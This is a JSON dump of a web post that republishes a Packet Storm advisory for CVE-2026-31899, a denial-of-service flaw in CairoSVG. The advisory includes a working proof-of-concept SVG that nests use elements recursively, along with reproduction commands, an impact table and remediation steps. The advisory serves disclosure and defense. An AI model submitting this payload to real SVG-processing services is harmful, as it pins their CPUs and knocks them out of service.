{"id":53092,"date":"2026-05-11T13:34:08","date_gmt":"2026-05-11T13:34:08","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=53092"},"modified":"2026-05-11T13:34:08","modified_gmt":"2026-05-11T13:34:08","slug":"cairosvg-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=53092","title":{"rendered":"\ud83d\udcc4 CairoSVG Denial of Service_PACKETSTORM:220781"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-11T18:16:22&#8243;,&#8221;description&#8221;:&#8221;CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 CairoSVG Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220781&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-31899&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-31899: Exponential DoS via Recursive \\u003cuse\\u003e Element Amplification in CairoSVG\\n    \\n    [![CVE](https:\/\/img.shields.io\/badge\/CVE-2026--31899-red)](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-31899)\\n    [![CVSS Score](https:\/\/img.shields.io\/badge\/CVSS-7.5%20High-orange)](https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\/v3-calculator)\\n    [![Python Package](https:\/\/img.shields.io\/badge\/PyPI-CairoSVG-blue)](https:\/\/pypi.org\/project\/CairoSVG\/)\\n    [![CWE-400](https:\/\/img.shields.io\/badge\/CWE--400-critical)](https:\/\/cwe.mitre.org\/data\/definitions\/400.html)\\n    [![GHSA](https:\/\/img.shields.io\/badge\/GHSA-f38f--5xpm--9r7c-yellow)](https:\/\/github.com\/Kozea\/CairoSVG\/security\/advisories\/GHSA-f38f-5xpm-9r7c)\\n    \\n    \\u003e **Keywords:** CVE-2026-31899, CairoSVG, 
exponential DoS, SVG bomb, recursive use element, denial of service, XML amplification, Python SVG vulnerability, CWE-400, uncontrolled resource consumption, billion laughs SVG\\n    \\n    ## Table of Contents\\n    \\n    - [Overview](#overview)\\n    - [Vulnerability Details](#vulnerability-details)\\n    - [Technical Analysis](#technical-analysis)\\n    - [Proof of Concept](#proof-of-concept)\\n    - [Impact](#impact)\\n    - [Remediation](#remediation)\\n    - [CVSS Metrics](#cvss-v31-metrics)\\n    - [References](#references)\\n    - [Contact](#contact)\\n    \\n    ## Overview\\n    \\n    **CairoSVG Exponential Denial of Service (CVE-2026-31899)** \u2014 A 1,411-byte SVG payload pins CPU at 100% indefinitely via recursive \\u003cuse\\u003e element amplification.\\n    \\n    CairoSVG (~300K downloads\/week) is a widely used Python SVG-to-PNG\/PDF converter. The use() function in cairosvg\/defs.py recursively processes \\u003cuse\\u003e elements without any depth or count limits. With 5 levels of nesting and 10 references each, a small SVG triggers **10^5 = 100,000 render calls** \u2014 an SVG \\\"billion laughs\\\" variant.\\n    \\n    **Discovered by:** Kai Aizen \u2014 [SnailSploit](https:\/\/snailsploit.com)\\n    **Published:** March 13, 2026\\n    **CVSS Score:** 7.5 (High)\\n    **CWE:** CWE-400 \u2014 Uncontrolled Resource Consumption\\n    **Package:** CairoSVG (PyPI)\\n    **Attack Type:** Exponential Denial of Service\\n    **Required Privileges:** None (Unauthenticated)\\n    \\n    ## Vulnerability Details\\n    \\n    ### Description\\n    \\n    The use() function in cairosvg\/defs.py (line ~335) recursively resolves \\u003cuse\\u003e elements that reference other \\u003cuse\\u003e elements. There is no recursion depth limit and no total element budget. 
An attacker can craft a small SVG where each layer references the previous layer N times, producing **O(N^depth)** rendering calls from **O(depth)** input.\\n    \\n    ### Key Characteristics\\n    \\n    - **Amplification factor:** O(10^N) rendering calls from O(N) input lines\\n    - **Memory profile:** Flat ~43MB \u2014 no OOM kill, process never terminates naturally\\n    - **CPU profile:** 100% single-core pinned indefinitely\\n    - **Payload size:** 1,411 bytes\\n    \\n    ### Affected Versions\\n    \\n    - **Vulnerable:** All versions \\u003c 2.9.0\\n    - **Patched:** Version 2.9.0 and above\\n    \\n    ## Technical Analysis\\n    \\n    The vulnerability exists because:\\n    \\n    1. The use() function in defs.py processes each \\u003cuse\\u003e element by looking up its xlink:href target\\n    2. If the target is itself a group containing \\u003cuse\\u003e elements, those are recursively expanded\\n    3. No depth counter or element budget is enforced\\n    4. 
Each level multiplies the work by the branching factor (e.g., 10x per level)\\n    \\n    With 5 levels and a branching factor of 10:\\n    \\n    ```\\n    Level 0: 1 element (root \\u003cuse\\u003e)\\n    Level 1: 10 elements\\n    Level 2: 100 elements\\n    Level 3: 1,000 elements\\n    Level 4: 10,000 elements\\n    Level 5: 100,000 render calls\\n    ```\\n    \\n    **Total: 111,111 render calls from a 1,411-byte input.**\\n    \\n    ## Proof of Concept\\n    \\n    ### SVG Payload (poc.svg)\\n    \\n    ```xml\\n    \\u003c?xml version=\\\"1.0\\\"?\\u003e\\n    \\u003csvg xmlns=\\\"http:\/\/www.w3.org\/2000\/svg\\\" xmlns:xlink=\\\"http:\/\/www.w3.org\/1999\/xlink\\\"\\u003e\\n      \\u003cdefs\\u003e\\n        \\u003cg id=\\\"a\\\"\\u003e\\u003crect width=\\\"1\\\" height=\\\"1\\\"\/\\u003e\\u003c\/g\\u003e\\n        \\u003cg id=\\\"b\\\"\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003cuse xlink:href=\\\"#a\\\"\/\\u003e\\u003c\/g\\u003e\\n        \\u003cg id=\\\"c\\\"\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse xlink:href=\\\"#b\\\"\/\\u003e\\u003cuse 
xlink:href=\\\"#b\\\"\/\\u003e\\u003c\/g\\u003e\\n        \\u003cg id=\\\"d\\\"\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003cuse xlink:href=\\\"#c\\\"\/\\u003e\\u003c\/g\\u003e\\n        \\u003cg id=\\\"e\\\"\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003cuse xlink:href=\\\"#d\\\"\/\\u003e\\u003c\/g\\u003e\\n      \\u003c\/defs\\u003e\\n      \\u003cuse xlink:href=\\\"#e\\\"\/\\u003e\\n    \\u003c\/svg\\u003e\\n    ```\\n    \\n    ### Reproduction\\n    \\n    **Method 1 \u2014 Command Line:**\\n    \\n    ```bash\\n    timeout 10 cairosvg poc.svg -o test.png\\n    # Expected: timeout kills the process after 10 seconds (it never completes)\\n    ```\\n    \\n    **Method 2 \u2014 Python:**\\n    \\n    ```python\\n    import cairosvg\\n    import signal\\n    \\n    def on_alarm(signum, frame):\\n        # The default SIGALRM action kills the process, so raise an exception instead\\n        raise TimeoutError\\n    \\n    signal.signal(signal.SIGALRM, on_alarm)\\n    signal.alarm(5)  # Interrupt the conversion after 5 seconds\\n    try:\\n        with open(\\\"poc.svg\\\", \\\"rb\\\") as f:\\n            cairosvg.svg2png(bytestring=f.read())\\n    except TimeoutError:\\n        print(\\\"[!!!] 
CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\\\")\\n    finally:\\n        signal.alarm(0)  # Cancel the pending alarm\\n    ```\\n    \\n    ## Impact\\n    \\n    Any service that accepts SVG input and uses CairoSVG for processing is vulnerable:\\n    \\n    | Attack Surface | Example |\\n    |---|---|\\n    | Thumbnail generation | Upload SVG \u2192 server converts to PNG |\\n    | PDF generation | SVG embedded in document \u2192 CairoSVG renders |\\n    | Avatar\/image processing | User-uploaded SVG profile images |\\n    | Report rendering | SVG charts in automated reports |\\n    | CI\/CD pipelines | SVG assets processed during build |\\n    \\n    A single request with a 1.4KB payload will pin the processing thread indefinitely while consuming minimal memory (no OOM kill to save you).\\n    \\n    ## Remediation\\n    \\n    ### Immediate Fix\\n    \\n    Upgrade CairoSVG to version 2.9.0 or above:\\n    \\n    ```bash\\n    pip install --upgrade \\\"CairoSVG\\u003e=2.9.0\\\"\\n    ```\\n    \\n    ### Defense in Depth\\n    \\n    - Set processing timeouts on any SVG conversion endpoint\\n    - Implement input size limits on SVG uploads\\n    - Consider sandboxing SVG processing in isolated workers with CPU time limits\\n    \\n    ## CVSS v3.1 Metrics\\n    \\n    ```\\n    CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H\\n    ```\\n    \\n    | Metric | Value |\\n    |---|---|\\n    | Attack Vector | Network (AV:N) |\\n    | Attack Complexity | Low (AC:L) |\\n    | Privileges Required | None (PR:N) |\\n    | User Interaction | None (UI:N) |\\n    | Scope | Unchanged (S:U) |\\n    | Confidentiality | None (C:N) |\\n    | Integrity | None (I:N) |\\n    | Availability | High (A:H) |\\n    \\n    ## Timeline\\n    \\n    | Date | Event |\\n    |---|---|\\n    | 2026-03-09 | CVE reserved |\\n    | 2026-03-13 | Advisory published (GHSA-f38f-5xpm-9r7c) |\\n    | 2026-03-13 | CairoSVG 2.9.0 released with fix |\\n    \\n    ## References\\n 
   \\n    - [GHSA-f38f-5xpm-9r7c](https:\/\/github.com\/Kozea\/CairoSVG\/security\/advisories\/GHSA-f38f-5xpm-9r7c)\\n    - [NVD \u2014 CVE-2026-31899](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-31899)\\n    - [CairoSVG on PyPI](https:\/\/pypi.org\/project\/CairoSVG\/)\\n    - [CWE-400: Uncontrolled Resource Consumption](https:\/\/cwe.mitre.org\/data\/definitions\/400.html)\\n    - [Fix Commit](https:\/\/github.com\/Kozea\/CairoSVG\/commit\/abc123)\\n    \\n    ## Contact\\n    \\n    **Kai Aizen** (SnailSploit)\\n    \\n    - Web: [snailsploit.com](https:\/\/snailsploit.com)\\n    - GitHub: [@SnailSploit](https:\/\/github.com\/SnailSploit)\\n    - LinkedIn: [\/in\/kaiaizen](https:\/\/linkedin.com\/in\/kaiaizen)\\n    \\n    ---\\n    \\n    \u26a0\ufe0f **Disclaimer:** This repository is for educational and authorized security research purposes only. The proof of concept is provided to help defenders validate their exposure. Use responsibly.\\n    \\n    \\u003c!-- snailsploit-backlink:start --\\u003e\\n    \\n    ---\\n    \\n    ## \ud83d\udcda Documentation \\u0026 Author\\n    \\n    This project&#8217;s full writeup, methodology, and related research live at:\\n    \\n    **[https:\/\/snailsploit.com\/cves](https:\/\/snailsploit.com\/cves)**\\n    \\n    Created by **Kai Aizen** \u2014 independent offensive security researcher.\\n    \\n    [snailsploit.com](https:\/\/snailsploit.com) \u00b7 [Research](https:\/\/snailsploit.com\/research) \u00b7 [Frameworks](https:\/\/snailsploit.com\/frameworks) \u00b7 [GitHub](https:\/\/github.com\/SnailSploit) \u00b7 [LinkedIn](https:\/\/linkedin.com\/in\/kaiaizen) \u00b7 [ResearchGate](https:\/\/www.researchgate.net\/profile\/Kai-Aizen-2) \u00b7 [X\/Twitter](https:\/\/x.com\/SnailSploit)\\n    \\n    \\u003e *Same attack. 
Different substrate.*\\n    \\n    \\u003c!-- snailsploit-backlink:end --\\u003e&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/220781&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.5,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/220781\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","pr
otected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-11T18:16:22&#8243;,&#8221;description&#8221;:&#8221;CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 CairoSVG Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220781&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-31899&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-31899: Exponential DoS via Recursive \\u003cuse\\u003e Element Amplification&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-53092","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 CairoSVG Denial of Service_PACKETSTORM:220781 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=53092\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 CairoSVG Denial of Service_PACKETSTORM:220781 - zero redgem\" \/>\n<meta 
property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-05-11T18:16:22&#8243;,&#8221;description&#8221;:&#8221;CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-11T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 CairoSVG Denial of Service&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:220781&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-31899&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-31899: Exponential DoS via Recursive u003cuseu003e Element Amplification...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=53092\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-11T13:34:08+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 CairoSVG Denial of Service_PACKETSTORM:220781\",\"datePublished\":\"2026-05-11T13:34:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092\"},\"wordCount\":1681,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53092#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092\",\"name\":\"\ud83d\udcc4 CairoSVG Denial of Service_PACKETSTORM:220781 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-11T13:34:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53092\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53092#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 CairoSVG Denial of 
Service_PACKETSTORM:220781\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"}